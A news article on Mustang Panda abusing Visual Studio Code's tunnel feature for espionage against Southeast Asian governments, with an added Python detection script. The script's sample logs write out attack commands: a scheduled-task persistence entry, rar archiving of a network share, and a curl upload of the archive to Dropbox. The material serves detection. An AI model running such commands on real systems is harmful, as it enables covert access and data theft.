The China-linked advanced persistent threat (APT) group known as Mustang Panda has been observed leveraging Microsoft’s Visual Studio Code (VSCode) software as a weapon in its arsenal of cyber espionage tools. This news comes from a recent report by Palo Alto Networks’ Unit 42, shedding light on a series of attacks targeting government entities across Southeast Asia.
Novel Exploitation of VSCode’s Reverse Shell Feature
The campaign, believed to be an extension of activities first detected in late 2023, showcases a relatively new technique in cyber warfare. Mustang Panda, known by aliases such as BASIN, Bronze President, and Earth Preta, has weaponized VSCode’s embedded reverse shell feature to establish a foothold in targeted networks.
Tom Fakterman, a researcher at Unit 42, explained the attack vector: “To abuse Visual Studio Code for malicious purposes, an attacker can use the portable version of code.exe, or an already installed version of the software. By running the command code.exe tunnel, an attacker receives a link that requires them to log into GitHub with their own account.”
This process grants the attacker access to a web-based VSCode environment connected directly to the compromised machine, allowing for remote code execution and file manipulation.
Sophisticated Tactics for Persistence and Data Exfiltration
The APT group’s methodology doesn’t stop at initial access. Mustang Panda operatives used the VSCode tunnel to deliver additional malware, conduct network reconnaissance, and exfiltrate sensitive data. The attackers also leveraged OpenSSH for lateral movement within compromised networks, executing commands and transferring files across multiple systems.
In a notable tactic, the group employed legitimate tools like the file archiver rar.exe over SMB to package and steal data from various network drives. To further obfuscate their activities, they used curl to upload exfiltrated information to Dropbox, blending malicious traffic with legitimate cloud storage operations.
Potential Collaboration or Overlap with Other Chinese APTs
During their investigation, Unit 42 researchers uncovered a second cluster of malicious activity occurring simultaneously within the same infected environments. This separate intrusion set utilized ShadowPad, a modular backdoor commonly associated with Chinese espionage groups.
“Based on the forensic evidence and timeline, one could conclude that these two clusters originated from the same threat actor,” Fakterman noted. However, he also suggested alternative explanations, including the possibility of collaboration between multiple Chinese APT groups.
Implications for Cybersecurity and Government Entities
The discovery of VSCode exploitation in the wild marks a significant evolution in APT tactics. Cybersecurity experts recommend that organizations closely monitor for unusual VSCode activity and scrutinize persistence mechanisms such as scheduled tasks that could indicate a compromise.
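The monitoring recommended above can be expressed as a handful of detection rules over process-creation telemetry, covering the behaviours the article describes: the `code.exe tunnel` invocation, a scheduled task whose action starts such a tunnel, `rar.exe` packaging data from a network share over SMB, and `curl` uploading to Dropbox. The following Python is an added example, not code from the article or from Unit 42’s report; the `Key=value | Key=value` log format, the file paths, host names, task name and the Dropbox API URL in the sample lines are all constructed for illustration, and the rule names are the author’s own.

```python
"""Added detection example (not from the article or the Unit 42 report).

Scans Sysmon-style process-creation log lines and flags the four behaviours
the article describes. The 'Key=value | Key=value' format and every sample
line are constructed for this example; none of the values are indicators
taken from the report.
"""
import re
import shlex
from dataclasses import dataclass

# Constructed sample telemetry: one benign service, one benign VSCode launch,
# then the four suspicious events. Paths, host names and URLs are illustrative.
SAMPLE_LOG = r"""
EventID=1 | Image=C:\Windows\System32\svchost.exe | CommandLine=svchost.exe -k netsvcs | ParentImage=C:\Windows\System32\services.exe
EventID=1 | Image=C:\Users\jdoe\AppData\Local\Programs\Microsoft VS Code\Code.exe | CommandLine="C:\Users\jdoe\AppData\Local\Programs\Microsoft VS Code\Code.exe" --folder-uri C:\proj | ParentImage=C:\Windows\explorer.exe
EventID=1 | Image=C:\Users\Public\code.exe | CommandLine=code.exe tunnel | ParentImage=C:\Windows\System32\cmd.exe
EventID=1 | Image=C:\Windows\System32\schtasks.exe | CommandLine=schtasks /create /sc onlogon /tn Updater /tr "C:\Users\Public\code.exe tunnel" | ParentImage=C:\Windows\System32\cmd.exe
EventID=1 | Image=C:\Program Files\WinRAR\rar.exe | CommandLine=rar.exe a -r C:\Users\Public\out.rar \\FILESRV01\Finance\*.xlsx | ParentImage=C:\Windows\System32\cmd.exe
EventID=1 | Image=C:\Windows\System32\curl.exe | CommandLine=curl.exe -X POST https://content.dropboxapi.com/2/files/upload --data-binary @C:\Users\Public\out.rar | ParentImage=C:\Windows\System32\cmd.exe
"""


@dataclass
class Finding:
    line_no: int
    rule: str
    detail: str


def parse_event(line: str) -> dict:
    """Split 'Key=value | Key=value' into a dict (constructed log format)."""
    fields = {}
    for part in line.split(" | "):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def argv(cmdline: str) -> list:
    """Tokenise a Windows command line; quotes are kept and backslashes are literal."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        return cmdline.split()


# \\server\share\... style path, i.e. data reached over SMB rather than a local drive.
UNC_PATH = re.compile(r"\\\\[A-Za-z0-9_.$-]+\\[^\s\"']+")
# Any dropbox.com / dropboxapi.com URL on a curl command line.
DROPBOX_URL = re.compile(r"https?://[^\s\"'/]*dropbox(?:api)?\.com\S*", re.I)


def check_event(ev: dict):
    """Yield (rule, detail) pairs for a single parsed event."""
    image = image_name(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    args = [a.lower() for a in argv(cmd)]
    low = cmd.lower()
    # Rule 1: the VSCode CLI started in tunnel mode (the reverse-shell feature).
    if image == "code.exe" and "tunnel" in args[1:]:
        yield "vscode_tunnel", cmd
    # Rule 2: persistence via a scheduled task whose action launches a tunnel.
    if image == "schtasks.exe" and "/create" in args and "code.exe" in low and "tunnel" in low:
        yield "schtask_vscode_tunnel", cmd
    # Rule 3: rar.exe packaging files reached through a UNC path (SMB share).
    if image == "rar.exe":
        m = UNC_PATH.search(cmd)
        if m:
            yield "rar_over_smb", m.group(0)
    # Rule 4: curl.exe talking to Dropbox, the exfiltration channel described.
    if image == "curl.exe":
        m = DROPBOX_URL.search(cmd)
        if m:
            yield "curl_dropbox", m.group(0)


def scan(log_text: str) -> list:
    """Run every rule over every non-empty log line; return findings in log order."""
    findings = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        for rule, detail in check_event(parse_event(line)):
            findings.append(Finding(n, rule, detail))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}: {f.detail}")
```

Rules 1 and 2 match on the image name and the `tunnel` argument rather than on the install path, because the article notes the attacker may use either a portable `code.exe` dropped anywhere or an already installed copy; the benign `Code.exe --folder-uri` launch in the sample does not fire. In an environment where developers legitimately use VSCode tunnels, the `vscode_tunnel` rule is best paired with an allow-list of expected users or parent processes so that a tunnel started from `cmd.exe` under a non-developer account stands out.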
The ability of Mustang Panda to abuse legitimate development tools highlights the importance of comprehensive security measures that go beyond traditional malware detection.